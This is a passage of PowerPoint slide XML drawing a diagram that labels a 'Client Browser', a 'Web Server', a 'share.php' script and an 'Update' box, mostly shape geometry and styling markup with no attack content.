        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9513146" y="3159929"/>
            <a:ext cx="1469813" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-73" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="3144690"/>
            <a:ext cx="2133600" cy="1997287"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1600200" h="1497964">
                <a:moveTo>
                  <a:pt x="1600200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1497838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1600200" y="1497838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1600200" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="4F81BC"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="3144690"/>
            <a:ext cx="2133600" cy="619827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="385D89"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="248073" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="163403">
              <a:spcBef>
                <a:spcPts val="1953"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1140527" y="3595793"/>
            <a:ext cx="10610427" cy="2203027"/>
            <a:chOff x="855395" y="2696845"/>
            <a:chExt cx="7957820" cy="1652270"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6636003" y="2709545"/>
              <a:ext cx="2164715" cy="1626870"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2164715" h="1626870">
                  <a:moveTo>
                    <a:pt x="1863217" y="277368"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="277368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1568488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60751" y="1581460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118865" y="1592650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174464" y="1602125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227670" y="1609954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278606" y="1616206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327396" y="1620950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374161" y="1624253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419024" y="1626184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462108" y="1626813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503536" y="1626207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543430" y="1624436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581913" y="1621567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655136" y="1612812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724188" y="1600491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790049" y="1585152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853702" y="1567345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916126" y="1547617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1105850" y="1482399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1139115" y="1471370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208161" y="1449791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1281378" y="1429309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1319857" y="1419651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1359746" y="1410473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1401169" y="1401843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1444248" y="1393831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1489106" y="1386505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1535864" y="1379933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1584647" y="1374184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1635577" y="1369326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1688776" y="1365428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744367" y="1362560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802473" y="1360788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1863217" y="1360182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1863217" y="277368"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2164715" h="1626870">
                  <a:moveTo>
                    <a:pt x="2004060" y="137032"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="153543" y="137032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153543" y="277368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1863217" y="277368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1863217" y="1234147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1875329" y="1232969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1907254" y="1230376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952371" y="1227782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2004060" y="1226604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2004060" y="137032"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2164715" h="1626870">
                  <a:moveTo>
                    <a:pt x="2164334" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="297815" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297815" y="137032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2004060" y="137032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2004060" y="1091819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2017833" y="1090945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054145" y="1089025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2105483" y="1087104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2164334" y="1086231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2164334" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6636003" y="2709545"/>
              <a:ext cx="2164715" cy="1626870"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2164715" h="1626870">
                  <a:moveTo>
                    <a:pt x="0" y="277368"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1863217" y="277368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1863217" y="1360182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802473" y="1360788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744367" y="1362560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1688776" y="1365428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1635577" y="1369326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1584647" y="1374184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1535864" y="1379933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1489106" y="1386505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1444248" y="1393831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1401169" y="1401843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1359746" y="1410473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1319857" y="1419651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1281378" y="1429309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1244187" y="1439378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173178" y="1460477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1105850" y="1482399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1041219" y="1504596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1009609" y="1515625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978305" y="1526518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916126" y="1547617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853702" y="1567345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790049" y="1585152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724188" y="1600491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655136" y="1612812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581913" y="1621567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543430" y="1624436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503536" y="1626207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462108" y="1626813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419024" y="1626184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374161" y="1624253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327396" y="1620950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278606" y="1616206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227670" y="1609954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174464" y="1602125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118865" y="1592650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60751" y="1581460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1568488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="277368"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2164715" h="1626870">
                  <a:moveTo>
                    <a:pt x="153543" y="277368"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="153543" y="137032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2004060" y="137032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2004060" y="1226604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952371" y="1227782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1907254" y="1230376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1875329" y="1232969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1863217" y="1234147"/>
                  </a:lnTo>
                </a:path>
                <a:path w="2164715" h="1626870">
                  <a:moveTo>
                    <a:pt x="297815" y="137032"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="297815" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2164334" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2164334" y="1086231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2105483" y="1087104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054145" y="1089025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2017833" y="1090945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2004060" y="1091819"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="4F81BC"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="855395" y="2848648"/>
              <a:ext cx="507199" cy="507199"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1451863" y="2893237"/>
              <a:ext cx="417906" cy="417906"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="900048" y="3355797"/>
              <a:ext cx="417906" cy="401243"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="object 15"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1453768" y="3358350"/>
              <a:ext cx="414185" cy="414185"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9436777" y="4657005"/>
            <a:ext cx="1313180" cy="304421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>share.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-27" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>hp</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2946401" y="1583181"/>
            <a:ext cx="6249247" cy="2463800"/>
            <a:chOff x="2209800" y="1187386"/>
            <a:chExt cx="4686935" cy="1847850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="2863689"/>
              <a:ext cx="4686935" cy="171450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4653884" y="66454"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4648581" y="66454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648708" y="104554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578020" y="104631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4524756" y="135796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4519076" y="140846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515897" y="147433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515433" y="154709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517898" y="161831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4522948" y="167511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4529534" y="170689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536811" y="171154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4543933" y="168689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4686427" y="85377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4653884" y="66454"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4578262" y="66531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="71534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="109634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578020" y="104631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578262" y="66531"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4610798" y="85453"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4578020" y="104631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648708" y="104554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648699" y="101887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639056" y="101887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85453"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4638929" y="68994"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639056" y="101887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4638929" y="68994"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4648589" y="68994"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4638929" y="68994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639056" y="101887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648699" y="101887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648589" y="68994"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4648581" y="66454"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4578262" y="66531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4638929" y="68994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648589" y="68994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648581" y="66454"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4536612" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4529312" y="494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4522749" y="3679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517771" y="9304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515306" y="16498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515770" y="23798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518949" y="30360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4524629" y="35339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578262" y="66531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4653884" y="66454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4543806" y="2446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536612" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="object 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2514600" y="1200086"/>
              <a:ext cx="3733800" cy="1082675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3733800" h="1082675">
                  <a:moveTo>
                    <a:pt x="0" y="1082230"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3733800" y="1082230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3733800" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1082230"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="385D89"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3786123" y="1624584"/>
            <a:ext cx="2520527" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Update</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-67" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
